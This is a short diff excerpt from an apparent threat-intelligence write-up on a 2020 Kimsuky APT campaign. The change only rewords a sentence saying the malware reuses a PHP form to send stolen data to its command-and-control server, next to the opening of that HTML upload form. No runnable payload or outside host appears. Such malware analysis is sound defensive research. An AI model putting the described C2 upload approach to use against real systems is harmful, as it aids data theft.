StrangerealIntel/CyberThreatIntel/North Korea/APT/Kimsuky/2020-03-20/Analysis.md

   print "error"
 ```

-<h6>This reuse the code of the structure of the php form for send teh data of the C2.</h6>
+<h6>This reuse the code of the structure of the php form for sending teh data of the C2.</h6>

 ```html
 <form enctype="multipart/form-data" action="upload.php?param=" method="post">